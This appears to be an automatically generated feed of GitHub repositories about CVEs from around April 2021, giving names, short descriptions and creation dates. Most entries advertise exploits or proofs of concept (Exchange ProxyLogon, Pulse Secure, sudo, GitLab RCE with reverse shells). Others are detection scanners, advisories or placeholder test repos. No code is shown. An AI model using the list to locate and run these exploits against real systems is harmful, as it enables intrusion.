**Docker-compose to set up a test environment for exploiting CVE-2015-8562** : [lorenzodegiorgi/setup-cve-2015-8562](https://github.com/lorenzodegiorgi/setup-cve-2015-8562) create time: 2021-05-03T15:49:54Z

**cve-2020_6418-exploittt.js** : [Jabri1/cve-2020_6418-exploit](https://github.com/Jabri1/cve-2020_6418-exploit) create time: 2021-05-03T15:58:36Z

**POC from TestANull for CVE-2021-28482 on Exchange Server** : [Shadow0ps/CVE-2021-28482-Exchange-POC](https://github.com/Shadow0ps/CVE-2021-28482-Exchange-POC) create time: 2021-05-03T13:54:36Z

**事件: 微軟(Microsoft)上周公布了修補遭到駭客攻擊的 Exchange Server 漏洞,全球恐有數萬個組織受到影響。網域與被入侵的Exchange郵件伺服器有關,而這臺伺服器後來被駭客當作C&C中繼站使用,導致接下來發生加密攻擊事故。 嚴重性: 全球企業普遍使用微軟生態系執行日常業務,若遭受駭客攻擊,將造成用戶機敏資料外洩並導致極大損失。雖然微軟已推出更新補釘,但阿戴爾強調這尚未去除儲存在受害伺服器內的後門殼層(webshell),因此就算尚未受到攻擊的企業可以免於被駭風險,駭客仍有時間入侵已被駭的伺服器留下「定時炸彈」。 從2020年開始,美國便不斷指控中國入侵多家醫藥公司及學術單位,試圖竊取疫苗研發機密,這次事件很可能將使中美之間的關係進一步惡化。至於華為、TikTok等中國服務是否會受到這次駭客事件波及,則暫時還不明朗。 漏洞通報程序: 在2年前,曾經拿下資安圈漏洞奧斯卡獎Pwnie Awards「最佳伺服器漏洞獎」戴夫寇爾首席資安研究員Orange Tsai(蔡政達),漏洞通報記錄不勝枚舉,後來因為針對企業常用的SSL VPN進行漏洞研究與通報,更是在全球資安圈聲名大噪。 不過,在今年3月2日卻發生讓Orange Tsai錯愕不已的事情。那就是,他在今年一月跟微軟通報的2個Exchange漏洞,微軟原訂在3月9日對外釋出修補程式,卻突然提前一週,在3月2日便緊急釋出修補程式。原來是因為,在2月26日到2月28日,這個週五下班後到週末這段期間,全球各地發生許多利用微軟Exchange漏洞發動攻擊的資安事件。 攻擊本質: 有人在網路上大量掃描微軟於本月修補的CVE-2020-0688安全漏洞,該漏洞攸關Microsoft Exchange伺服器,呼籲Exchange用戶應儘速修補。 CVE-2020-0688漏洞肇因於Exchange伺服器在安裝時沒能妥善建立唯一金鑰,將允許具備該知識及信箱的授權用戶以系統權限傳遞任意物件,屬於遠端程式攻擊漏洞,該漏洞影響Microsoft Exchange Server 2010 SP3、Microsoft Exchange Server 2013、Microsoft Exchange Server 2016與Microsoft Exchange Server 2019,但只被微軟列為重要(Important)等級的風險。** : [ann0906/proxylogon](https://github.com/ann0906/proxylogon) create time: 2021-05-03T09:44:25Z

**no description** : [sapkota2k20/CVE-2021-27553](https://github.com/sapkota2k20/CVE-2021-27553) create time: 2021-05-03T06:02:03Z

**no description** : [AmIAHuman/OverlayFS-CVE-2021-3493](https://github.com/AmIAHuman/OverlayFS-CVE-2021-3493) create time: 2021-05-03T05:58:06Z

**Serie de scripts para enumerar nombres de usuarios de JIRA a partir de vulnerabilidades conocidas (CVE-2020-14181, CVE-2019-3403, CVE-2019-8449...)** : [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira) create time: 2020-09-15T23:00:03Z

**Completed a working exploit for CVE-2018-17463 for fun.** : [kdmarti2/CVE-2018-17463](https://github.com/kdmarti2/CVE-2018-17463) create time: 2021-05-02T22:44:33Z

**GitLab Arbitrary File Read Exploit** : [nickvdyck/gitlab-cve-2020-10977](https://github.com/nickvdyck/gitlab-cve-2020-10977) create time: 2021-05-02T08:45:03Z

**no description** : [DXY0411/CVE-2020-23342](https://github.com/DXY0411/CVE-2020-23342) create time: 2021-05-02T03:57:32Z

**no description** : [Abdennour-py/CVE-2021-3493](https://github.com/Abdennour-py/CVE-2021-3493) create time: 2021-05-02T01:58:29Z

**vsftpd 2.3.4 Backdoor Exploit** : [nobodyatall648/CVE-2011-2523](https://github.com/nobodyatall648/CVE-2011-2523) create time: 2021-05-01T15:03:55Z

**Drupal Drupal 8.6.x RCE Exploit** : [nobodyatall648/CVE-2019-6340](https://github.com/nobodyatall648/CVE-2019-6340) create time: 2021-05-01T15:00:34Z

**no description** : [eR072391/cve-2017-5674](https://github.com/eR072391/cve-2017-5674) create time: 2021-05-01T14:04:58Z

**my exploit for the proxylogon chain (Microsoft Exchange Server - CVE-2021-26855)** : [hakivvi/proxylogon](https://github.com/hakivvi/proxylogon) create time: 2021-03-14T13:04:07Z

**no description** : [lvyoshino/CVE-2018-4878](https://github.com/lvyoshino/CVE-2018-4878) create time: 2021-04-30T20:45:39Z

**CVE-2020-27955** : [exileddb/CVE-2020-27955](https://github.com/exileddb/CVE-2020-27955) create time: 2021-04-30T14:25:42Z

**Proof of concept exploit for CVE-2019-8561 discovered by @jbradley89** : [0xmachos/CVE-2019-8561](https://github.com/0xmachos/CVE-2019-8561) create time: 2019-06-07T23:48:55Z

**no description** : [DeeLMind/CVE-2020-27955-LFS](https://github.com/DeeLMind/CVE-2020-27955-LFS) create time: 2021-04-30T09:38:48Z

**GIT-LFS-CVE-2020-27955** : [DeeLMind/GIT-LFS-CVE-2020-27955](https://github.com/DeeLMind/GIT-LFS-CVE-2020-27955) create time: 2021-04-30T09:15:39Z

**Apache OFBiz unsafe deserialization of XMLRPC arguments** : [g33xter/CVE-2020-9496](https://github.com/g33xter/CVE-2020-9496) create time: 2021-04-30T06:55:32Z

**Versión Dr. DLL (CVE-2018-18333)** : [mrx04programmer/Dr.DLL-CVE-2018-18333](https://github.com/mrx04programmer/Dr.DLL-CVE-2018-18333) create time: 2021-04-30T01:23:33Z

**Steps for Exploitation** : [sapkota2k20/CVE-2021-27552](https://github.com/sapkota2k20/CVE-2021-27552) create time: 2021-04-30T01:21:09Z

**Exploit for CVE-2018-19320** : [a00x90/CVE-2018-19320](https://github.com/a00x90/CVE-2018-19320) create time: 2021-04-29T22:44:24Z

**no description** : [LioTree/CVE-2021-30128](https://github.com/LioTree/CVE-2021-30128) create time: 2021-04-29T17:59:59Z

**Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin)** : [farisv/Moodle-CVE-2019-3810](https://github.com/farisv/Moodle-CVE-2019-3810) create time: 2021-04-29T09:38:08Z

**CVE-2021-3156 - Sudo Baron Samedit** : [LiveOverflow/pwnedit](https://github.com/LiveOverflow/pwnedit) create time: 2021-04-29T06:29:26Z

**Samba usermap script.** : [cherrera0001/CVE-2007-2447](https://github.com/cherrera0001/CVE-2007-2447) create time: 2021-04-29T03:48:01Z

**Authenticated SQL injection to command execution on Cacti 1.2.12** : [0z09e/CVE-2020-14295](https://github.com/0z09e/CVE-2020-14295) create time: 2021-04-28T20:57:00Z

**no description** : [lanzt/CVE-2020-14321](https://github.com/lanzt/CVE-2020-14321) create time: 2021-04-28T19:46:55Z

**PoC for CVE-2018-13382** : [tumikoto/exploit-fortinetmagicbackdoor](https://github.com/tumikoto/exploit-fortinetmagicbackdoor) create time: 2021-04-28T19:17:04Z

**InfluxDB CVE-2019-20933 vulnerability exploit** : [LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) create time: 2021-04-28T16:25:31Z

**Indicator of Compromise Scanner for CVE-2021-31221** : [f1reeye/ioc-scanner-CVE-2021-31221](https://github.com/f1reeye/ioc-scanner-CVE-2021-31221) create time: 2021-04-28T12:54:41Z

**CVE-2020-8958: Authenticated RCE exploit for NetLink HG323** : [Asjidkalam/CVE-2020-8958](https://github.com/Asjidkalam/CVE-2020-8958) create time: 2021-04-27T15:51:08Z

**no description** : [streghstreek/CVE-2020-1938](https://github.com/streghstreek/CVE-2020-1938) create time: 2021-04-27T14:57:30Z

**exploit** : [Y3A/CVE-2019-18634](https://github.com/Y3A/CVE-2019-18634) create time: 2021-04-27T13:50:24Z

**no description** : [lsw29475/CVE-2018-8611](https://github.com/lsw29475/CVE-2018-8611) create time: 2021-04-27T12:00:24Z

**Indicator of Compromise Scanner for CVE-2021-31221** : [fireaye/ioc-scanner-CVE-2021-31221](https://github.com/fireaye/ioc-scanner-CVE-2021-31221) create time: 2021-04-27T11:55:59Z

**CVE-2019-12725 ZeroShell 远程命令执行漏洞** : [givemefivw/CVE-2019-12725](https://github.com/givemefivw/CVE-2019-12725) create time: 2021-04-27T03:36:33Z

**测试用的** : [chenanu123/cve-2021-11123](https://github.com/chenanu123/cve-2021-11123) create time: 2021-04-27T03:23:24Z

**no description** : [mavillon/CVE-2021-26868](https://github.com/mavillon/CVE-2021-26868) create time: 2021-04-26T14:21:30Z

**no description** : [mavillon/cve-2021-26868](https://github.com/mavillon/cve-2021-26868) create time: 2021-04-26T13:58:52Z

**CVE-2019-5418 - File Content Disclosure on Ruby on Rails** : [mpgn/CVE-2019-5418](https://github.com/mpgn/CVE-2019-5418) create time: 2019-03-16T11:58:18Z

**no description** : [mavillon/cve-2018-8611](https://github.com/mavillon/cve-2018-8611) create time: 2021-04-26T01:50:13Z

**no description** : [uromulouinthehouse/CVE-2020-3161](https://github.com/uromulouinthehouse/CVE-2020-3161) create time: 2021-04-25T14:54:33Z

**Read my blog for more info -** : [exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732](https://github.com/exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732) create time: 2021-04-25T12:55:15Z

**CVE-2021-27905** : [W2Ning/Solr-SSRF](https://github.com/W2Ning/Solr-SSRF) create time: 2021-04-25T11:50:19Z

**rebuild cve** : [ImHades101/CVE-2021-3291](https://github.com/ImHades101/CVE-2021-3291) create time: 2021-04-25T11:18:09Z

**Exploiting a Cross-site request forgery (CSRF) attack to creat a new privileged user through the Webmin's add users feature** : [electronicbots/CVE-2021-31762](https://github.com/electronicbots/CVE-2021-31762) create time: 2021-04-21T20:13:06Z

**Exploiting a Cross-site request forgery (CSRF) attack to creat a new privileged user through the Webmin's add users feature** : [Mesh3l911/CVE-2021-31762](https://github.com/Mesh3l911/CVE-2021-31762) create time: 2021-04-21T20:06:09Z

**Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature** : [electronicbots/CVE-2021-31761](https://github.com/electronicbots/CVE-2021-31761) create time: 2021-04-21T20:00:09Z

**Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature** : [Mesh3l911/CVE-2021-31761](https://github.com/Mesh3l911/CVE-2021-31761) create time: 2021-04-21T19:46:43Z

**Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature** : [electronicbots/CVE-2021-31760](https://github.com/electronicbots/CVE-2021-31760) create time: 2021-04-21T19:43:53Z

**Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature** : [Mesh3l911/CVE-2021-31760](https://github.com/Mesh3l911/CVE-2021-31760) create time: 2021-04-21T00:09:54Z

**no description** : [Yealid/CVE-2018-6574](https://github.com/Yealid/CVE-2018-6574) create time: 2021-04-24T16:25:20Z

**no description** : [ppcrab/CVE-2018-5158](https://github.com/ppcrab/CVE-2018-5158) create time: 2021-04-24T13:28:14Z

**no description** : [b1tg/wechat-0day-CVE-2018-6065-exploit](https://github.com/b1tg/wechat-0day-CVE-2018-6065-exploit) create time: 2021-04-24T12:04:27Z

**Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass** : [darryk10/CVE-2021-25735](https://github.com/darryk10/CVE-2021-25735) create time: 2021-04-22T07:25:31Z

**CVE-2021-1732 poc & exp; tested on 20H2** : [Pai-Po/CVE-2021-1732](https://github.com/Pai-Po/CVE-2021-1732) create time: 2021-04-23T08:21:54Z

**no description** : [itssmikefm/CVE-2020-1472](https://github.com/itssmikefm/CVE-2020-1472) create time: 2021-04-22T18:51:09Z

**POC exploit for CVE-2021-21972** : [pettyhacks/vSphereyeeter](https://github.com/pettyhacks/vSphereyeeter) create time: 2021-04-22T14:00:38Z

**All files needed to reproduce PoC for CVE-2021-26415: https://www.cloaked.pl/2021/04/cve-2021-26415/** : [adenkiewicz/CVE-2021-26415](https://github.com/adenkiewicz/CVE-2021-26415) create time: 2021-04-22T13:55:40Z

**CVE-2021-22192** : [PetrusViet/Gitlab-RCE](https://github.com/PetrusViet/Gitlab-RCE) create time: 2021-04-22T09:35:57Z

**no description** : [X0UCYB3R/Check-WP-CVE-2020-35489](https://github.com/X0UCYB3R/Check-WP-CVE-2020-35489) create time: 2021-04-22T05:17:16Z

**no description** : [oneoy/CVE-2021-3493](https://github.com/oneoy/CVE-2021-3493) create time: 2021-04-22T02:06:21Z

**A proof of concept of CVE-2020-15808 vulnerability exploit on STM32F4 Discovery board** : [manucuf/CVE202015808](https://github.com/manucuf/CVE202015808) create time: 2021-04-21T18:48:28Z

**This is a proof of concept of the critical WinBox vulnerability (CVE-2018-14847) which allows for arbitrary file read of plain text passwords. The vulnerability has long since been fixed, so this project has ended and will not be supported or updated anymore. You can fork it and update it yourself instead.** : [hacker30468/Mikrotik-router-hack](https://github.com/hacker30468/Mikrotik-router-hack) create time: 2021-04-21T16:42:31Z

**Exploit code for CVE-2019-7488 and CVE-2019-7489 resulting in remote code execution.** : [nromsdahl/CVE-2019-7489](https://github.com/nromsdahl/CVE-2019-7489) create time: 2021-04-21T13:02:03Z

**Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)** : [Mad-robot/CVE-2021-22893](https://github.com/Mad-robot/CVE-2021-22893) create time: 2021-04-21T10:09:56Z

**PoC for exploiting RCE in Exchange CVEs: CVE-2021-28480, CVE-2021-28481, CVE-2021-28482 and CVE-2021-28483. Achieves Domain Admin on Domain Controllers running Windows Server 2003 up to Windows Server 2019.** : [ZephrFish/ExchangeRCE-CVE-2021-28480](https://github.com/ZephrFish/ExchangeRCE-CVE-2021-28480) create time: 2021-04-21T09:50:39Z

**Proof-of-Concept (PoC) script to exploit Pulse Secure CVE-2021-22893.** : [ZephrFish/CVE-2021-22893](https://github.com/ZephrFish/CVE-2021-22893) create time: 2021-04-21T09:48:57Z

**Apache Solr SSRF(CVE-2021-27905)** : [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF) create time: 2021-04-21T09:27:21Z

**Detected CVE-2021-28480,CVE-2021-28481** : [Udyz/Detect-CVE-2021-28480](https://github.com/Udyz/Detect-CVE-2021-28480) create time: 2021-04-21T04:52:14Z

**no description** : [Yealid/CVE-2018-11235-Git-Submodule-RCE](https://github.com/Yealid/CVE-2018-11235-Git-Submodule-RCE) create time: 2021-04-20T20:13:25Z

**jquery file upload poc** : [mi-hood/CVE-2018-9206](https://github.com/mi-hood/CVE-2018-9206) create time: 2021-04-20T09:25:37Z

**PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)** : [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm) create time: 2021-03-11T15:27:25Z

**no description** : [gejian-iscas/CVE-2020-14364](https://github.com/gejian-iscas/CVE-2020-14364) create time: 2021-04-20T03:03:25Z

**Ubuntu OverlayFS Local Privesc** : [briskets/CVE-2021-3493](https://github.com/briskets/CVE-2021-3493) create time: 2021-04-19T20:07:01Z

**1** : [hackzuoji/CVE-2021-1](https://github.com/hackzuoji/CVE-2021-1) create time: 2021-04-19T10:14:21Z

**針對近期微軟公布修補遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現安全漏洞後,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同時也將此項漏洞稱為「ProxyLogon」。 此次揭露的「ProxyLogon」漏洞,是以無需驗證即可使用的遠端程式碼執行 (Pre-Auth Remote Code Execution;Pre-Auth RCE)零日漏洞(Zero-day exploit),可讓攻擊者得以繞過身份驗證步驟,驅使系統管理員協助執行惡意文件或執行指令,進而觸發更廣泛的攻擊。 「ProxyLogon」是微軟近期被揭露最重大的RCE漏洞之一,DEVCORE團隊遵循責任揭露 (Responsible Disclosure)原則,在發現後便第一時間立即於今年1月5日通報微軟進行修補,避免該漏洞遭有心人士利用,造成全球用戶重大損失。而微軟遂於3月2日針對相關漏洞釋出安全更新,避免用戶機敏資訊遭受惡意攻擊。個人想法:遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同時也將此項漏洞稱為「ProxyLogon」。 此次揭露的「ProxyLogon」漏洞,是以無需驗證即可使用的遠端程式碼執行 (Pre-Auth Remote Code Execution;Pre-Auth RCE)零日漏洞(Zero-day exploit),可讓攻擊者得以繞過身份驗證步驟,驅使系統管理員協助執行惡意文件或執行指令,進而觸發更廣泛的攻擊。 「ProxyLogon」是微軟近期被揭露最重大的RCE漏洞之一,DEVCORE團隊遵循責任揭露 (Responsible Disclosure)原則,在發現後便第一時間立即於今年1月5日通報微軟進行修補,避免該漏洞遭有心人士利用,造成全球用戶重大損失。而微軟遂於3月2日針對相關漏洞釋出安全更新,避免用戶機敏資訊遭受惡意攻擊。個人想法:微軟是大眾常用的軟體之一,駭客只要察覺漏洞就會進行惡意的攻擊,微軟公布4個Exchange Server的安全漏洞後,就遭受駭客的惡意攻擊,這件事的發生,微軟需更加小心並提高資安的防護。** : [Nick-Yin12/106362522](https://github.com/Nick-Yin12/106362522) create time: 2021-04-19T09:33:52Z

**no description** : [r90tpass/CVE_2021hw](https://github.com/r90tpass/CVE_2021hw) create time: 2021-04-19T08:03:06Z

**Cibersecurity paython3 tool that search CVE by different patterns** : [f0ns1/CVE-2020-python_tool](https://github.com/f0ns1/CVE-2020-python_tool) create time: 2021-04-18T12:08:49Z

**demo testing CVE-2021-25281** : [SkyBulk/CVE-2021-25281](https://github.com/SkyBulk/CVE-2021-25281) create time: 2021-04-18T01:55:23Z

**A repository hosting write ups for the 0 days CVE-2021-25679, CVE-2021-25680, and CVE-2021-25681** : [3ndG4me/AdTran-Personal-Phone-Manager-Vulns](https://github.com/3ndG4me/AdTran-Personal-Phone-Manager-Vulns) create time: 2021-03-03T20:06:54Z

**CVE-2021-29349 CSRF to remove all messages in Mahara 20.10** : [Vulnmachines/CVE-2021-29349](https://github.com/Vulnmachines/CVE-2021-29349) create time: 2021-04-17T18:48:38Z

**张师傅牛逼** : [Reach-Z/CVE-2021-9999](https://github.com/Reach-Z/CVE-2021-9999) create time: 2021-04-17T06:52:04Z

**https://nvd.nist.gov/vuln/detail/CVE-2021-30481** : [floesen/CVE-2021-30481](https://github.com/floesen/CVE-2021-30481) create time: 2021-04-17T01:29:31Z

**no description** : [motikan2010/CVE-2021-29447](https://github.com/motikan2010/CVE-2021-29447) create time: 2021-04-16T20:41:26Z

**cve-2007-2447** : [Ki11i0n4ir3/Sambaster](https://github.com/Ki11i0n4ir3/Sambaster) create time: 2021-04-16T08:48:19Z

**my personal POC of CVE-2016-5195(dirtyCOW)** : [arttnba3/CVE-2016-5195](https://github.com/arttnba3/CVE-2016-5195) create time: 2021-04-16T05:59:04Z

**no description** : [mi-hood/CVE-2021test](https://github.com/mi-hood/CVE-2021test) create time: 2021-04-16T05:54:18Z

**CVE-2021-21402 Jellyfin任意文件读取 Wker脚本,可批量。** : [givemefivw/CVE-2021-21402](https://github.com/givemefivw/CVE-2021-21402) create time: 2021-04-16T05:20:20Z

**IOC_for_CVE-2021-28311** : [mi-hood/IOC_for_CVE-2021-28311](https://github.com/mi-hood/IOC_for_CVE-2021-28311) create time: 2021-04-16T04:48:52Z

**no description** : [MohamedTarekq/test-CVE-2018-11235](https://github.com/MohamedTarekq/test-CVE-2018-11235) create time: 2021-04-15T23:45:18Z

**cve-2019-5420** : [cved-sources/cve-2019-5420](https://github.com/cved-sources/cve-2019-5420) create time: 2019-03-27T18:16:46Z

**cve-2019-9194** : [cved-sources/cve-2019-9194](https://github.com/cved-sources/cve-2019-9194) create time: 2019-03-15T18:16:27Z

**cve-2019-9184** : [cved-sources/cve-2019-9184](https://github.com/cved-sources/cve-2019-9184) create time: 2019-03-15T18:12:49Z

**cve-2019-6340** : [cved-sources/cve-2019-6340](https://github.com/cved-sources/cve-2019-6340) create time: 2019-02-26T18:26:50Z

**no description** : [nice0e3/CVE-2021-22986_F5_BIG_IP_GUI_Exploit](https://github.com/nice0e3/CVE-2021-22986_F5_BIG_IP_GUI_Exploit) create time: 2021-04-15T16:15:17Z

**no description** : [somatrasss/CVE-2021-21402](https://github.com/somatrasss/CVE-2021-21402) create time: 2021-04-15T15:32:39Z

**Zeek package to detect CVE-2020-0601** : [0xxon/cve-2020-0601](https://github.com/0xxon/cve-2020-0601) create time: 2020-01-15T00:01:29Z

**CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞** : [Al1ex/CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928) create time: 2021-04-15T06:40:49Z

**no description** : [13202311145/CVE-2021-1000000](https://github.com/13202311145/CVE-2021-1000000) create time: 2021-04-15T03:04:56Z

**no description** : [MohamedTarekq/test-CVE-2018-6574-](https://github.com/MohamedTarekq/test-CVE-2018-6574-) create time: 2021-04-15T01:10:43Z

**TEST** : [13202311145/CVE-2021-10000000](https://github.com/13202311145/CVE-2021-10000000) create time: 2021-04-15T01:20:51Z

**PoC for DHCP vulnerability (NEW:WRECK) in FreeBSD** : [knqyf263/CVE-2020-7461](https://github.com/knqyf263/CVE-2020-7461) create time: 2021-04-14T20:37:38Z

**no description** : [givemefivw/CVE-2021-25646](https://github.com/givemefivw/CVE-2021-25646) create time: 2021-04-14T15:36:04Z

**no description** : [dabaicaishinima/cve-2021-test](https://github.com/dabaicaishinima/cve-2021-test) create time: 2021-04-14T14:32:35Z

**no description** : [S0por/CVE-2020-25078](https://github.com/S0por/CVE-2020-25078) create time: 2021-04-14T11:17:50Z

**CVE-2021-26855 & CVE-2021-27065** : [hosch3n/ProxyLogon](https://github.com/hosch3n/ProxyLogon) create time: 2021-04-14T11:12:30Z

**no description** : [S0por/CVE-2021-26295-Apache-OFBiz-EXP](https://github.com/S0por/CVE-2021-26295-Apache-OFBiz-EXP) create time: 2021-04-14T10:10:40Z

**Malicious Payloads that abuses Win32k Elevation of Privilege Vulnerability (CVE-2021-28310)** : [Rafael-Svechinskaya/IOC_for_CVE-2021-28310](https://github.com/Rafael-Svechinskaya/IOC_for_CVE-2021-28310) create time: 2021-04-14T06:36:40Z

**Config files for my GitHub profile.** : [ZiHeny/CVE-2021-6857](https://github.com/ZiHeny/CVE-2021-6857) create time: 2021-04-14T05:50:48Z

**no description** : [givemefivw/CVE-2021-3019](https://github.com/givemefivw/CVE-2021-3019) create time: 2021-04-14T03:45:38Z

**Disource POC** : [Mesh3l911/CVE-2021-3138](https://github.com/Mesh3l911/CVE-2021-3138) create time: 2021-01-12T22:50:27Z

**CVE-2020-17519 Cheetah** : [givemefivw/CVE-2020-17519](https://github.com/givemefivw/CVE-2020-17519) create time: 2021-04-13T11:38:18Z

**no description** : [givemefivw/CVE-2021-6666](https://github.com/givemefivw/CVE-2021-6666) create time: 2021-04-13T09:06:25Z

**no description** : [Henry4E36/CVE-2021-100000](https://github.com/Henry4E36/CVE-2021-100000) create time: 2021-04-13T09:02:14Z

**ceshi1** : [Henry4E36/CVE-2021-99999](https://github.com/Henry4E36/CVE-2021-99999) create time: 2021-04-13T08:03:30Z

**Auto exploit RCE CVE-2020-5902** : [haisenberg/CVE-2020-5902](https://github.com/haisenberg/CVE-2020-5902) create time: 2021-04-13T06:48:20Z

**Cross Site Scripting (XSS) at the "Reset Password" page form of Priority Enterprise Management System v8.00 allows attackers to execute javascript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site.** : [NagliNagli/CVE-2021-26832](https://github.com/NagliNagli/CVE-2021-26832) create time: 2021-04-13T04:25:31Z

**Samba exploit CVE2003-0201** : [KernelPan1k/trans2open-CVE-2003-0201](https://github.com/KernelPan1k/trans2open-CVE-2003-0201) create time: 2021-04-12T19:30:13Z

**Trigger-only for CVE-2021-29627** : [raymontag/cve-2021-29627](https://github.com/raymontag/cve-2021-29627) create time: 2021-04-12T07:51:03Z

**no description** : [givemefivw/CVE-2021-test](https://github.com/givemefivw/CVE-2021-test) create time: 2021-04-11T21:05:29Z

**GitLab 11.4.7 CE RCE exploit with different reverse shells. CVE-2018-19571 + CVE-2018-19585** : [Algafix/gitlab-RCE-11.4.7](https://github.com/Algafix/gitlab-RCE-11.4.7) create time: 2021-04-11T11:23:37Z

**Samba 3.0.20 username map script exploit** : [Un4gi/CVE-2007-2447](https://github.com/Un4gi/CVE-2007-2447) create time: 2021-04-11T07:53:20Z

**cve-2020-10977 read and execute** : [lisp3r/cve-2020-10977-read-and-execute](https://github.com/lisp3r/cve-2020-10977-read-and-execute) create time: 2021-04-11T06:31:06Z

**TEST** : [s1m0n-crypto/CVE-2021-998756](https://github.com/s1m0n-crypto/CVE-2021-998756) create time: 2021-04-11T04:02:05Z

**no description** : [hu185396/CVE-2021-11112](https://github.com/hu185396/CVE-2021-11112) create time: 2021-04-11T02:55:52Z

**ownCloud PoC for CVE-2013-0303** : [CiscoCXSecurity/ownCloud_RCE_CVE-2013-0303](https://github.com/CiscoCXSecurity/ownCloud_RCE_CVE-2013-0303) create time: 2021-04-10T19:18:07Z

**no description** : [rafaelfrageri/PTLB-CVE-2018-11235](https://github.com/rafaelfrageri/PTLB-CVE-2018-11235) create time: 2021-04-10T15:04:45Z

**no description** : [hu185396/CVE-2018-11111](https://github.com/hu185396/CVE-2018-11111) create time: 2021-04-10T13:44:10Z

**no description** : [hu185396/cve-2019-12345](https://github.com/hu185396/cve-2019-12345) create time: 2021-04-10T13:42:44Z

**no description** : [Elsfa7-110/CVE-2018-6389](https://github.com/Elsfa7-110/CVE-2018-6389) create time: 2020-10-18T14:01:59Z

**VMWare-CVE-2021-21975 SSRF vulnerability** : [Vulnmachines/VMWare-CVE-2021-21975](https://github.com/Vulnmachines/VMWare-CVE-2021-21975) create time: 2021-04-10T12:36:07Z

**no description** : [FSecureLABS/CVE-2021-25374_Samsung-Account-Access](https://github.com/FSecureLABS/CVE-2021-25374_Samsung-Account-Access) create time: 2021-04-10T09:23:52Z

**no description** : [lorddian/CVE-2021-9876543210](https://github.com/lorddian/CVE-2021-9876543210) create time: 2021-04-10T03:53:41Z

**no description** : [lorddian/CVE-2021-12345678910JQK](https://github.com/lorddian/CVE-2021-12345678910JQK) create time: 2021-04-10T03:42:46Z

**no description** : [lorddian/CVE-2021-88888888899](https://github.com/lorddian/CVE-2021-88888888899) create time: 2021-04-10T03:34:41Z

**An exploit to get root in vsftpd 2.3.4 (CVE-2011-2523) written in python** : [HerculesRD/vsftpd2.3.4PyExploit](https://github.com/HerculesRD/vsftpd2.3.4PyExploit) create time: 2021-04-09T20:26:01Z

**no description** : [RichardKabuto/CVE-2021-88888](https://github.com/RichardKabuto/CVE-2021-88888) create time: 2021-04-09T18:00:41Z

**MDaemon Advisories - CVE-2021-27180, CVE-2021-27181, CVE-2021-27182, CVE-2021-27183** : [chudyPB/MDaemon-Advisories](https://github.com/chudyPB/MDaemon-Advisories) create time: 2021-04-09T16:34:28Z

**CVE-2021-26295-POC 利用DNSlog进行CVE-2021-26295的漏洞验证。 使用 poc:将目标放于target.txt后运行python poc.py即可。(Jdk环境需<12,否则ysoserial无法正常生成有效载荷) exp:python exp.py https://baidu.com然后进入命令执行界面(无回显)** : [coolyin001/CVE-2021-26295--](https://github.com/coolyin001/CVE-2021-26295--) create time: 2021-04-09T16:20:18Z

**A simple python3 exploit for CVE-2019-3403** : [davidmckennirey/CVE-2019-3403](https://github.com/davidmckennirey/CVE-2019-3403) create time: 2021-03-18T22:36:58Z

**jiaocoll/CVE-2021-21402-Jellyfin** : [jiaocoll/CVE-2021-21402-Jellyfin](https://github.com/jiaocoll/CVE-2021-21402-Jellyfin) create time: 2021-04-09T08:54:55Z

**CVE-2020-35729** : [Al1ex/CVE-2020-35729](https://github.com/Al1ex/CVE-2020-35729) create time: 2021-04-09T07:59:43Z

**no description** : [john-dooe/CVE-2020-9472-poisoned-plugin](https://github.com/john-dooe/CVE-2020-9472-poisoned-plugin) create time: 2021-04-09T07:39:31Z

**CVE-2021-3317** : [Al1ex/CVE-2021-3317](https://github.com/Al1ex/CVE-2021-3317) create time: 2021-04-09T07:36:46Z

**CVE-2021-21402** : [xiaoshu-bit/CVE-2021-21402](https://github.com/xiaoshu-bit/CVE-2021-21402) create time: 2021-04-09T06:38:25Z

**no description** : [l1angfeng/CVE-2020-98745](https://github.com/l1angfeng/CVE-2020-98745) create time: 2021-04-09T05:58:47Z

**no description** : [hu185396/cve-2021-34567](https://github.com/hu185396/cve-2021-34567) create time: 2021-04-09T00:52:10Z

**no description** : [m1gnus/CVE-2018-1133_POC](https://github.com/m1gnus/CVE-2018-1133_POC) create time: 2021-04-08T19:41:57Z

**PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall** : [yanghaoi/CVE-2020-0601](https://github.com/yanghaoi/CVE-2020-0601) create time: 2020-02-03T13:58:07Z

**test** : [xuejilinhan/CVE-2021-24098](https://github.com/xuejilinhan/CVE-2021-24098) create time: 2021-04-08T15:39:33Z

**test** : [xuejilinhan/CVE-2021-24086](https://github.com/xuejilinhan/CVE-2021-24086) create time: 2021-04-08T15:37:26Z

**测试** : [kenyon-wong/cve-2021-21635](https://github.com/kenyon-wong/cve-2021-21635) create time: 2021-04-08T15:13:28Z

**test** : [habber12/cve_2021_25555](https://github.com/habber12/cve_2021_25555) create time: 2021-04-08T14:53:41Z

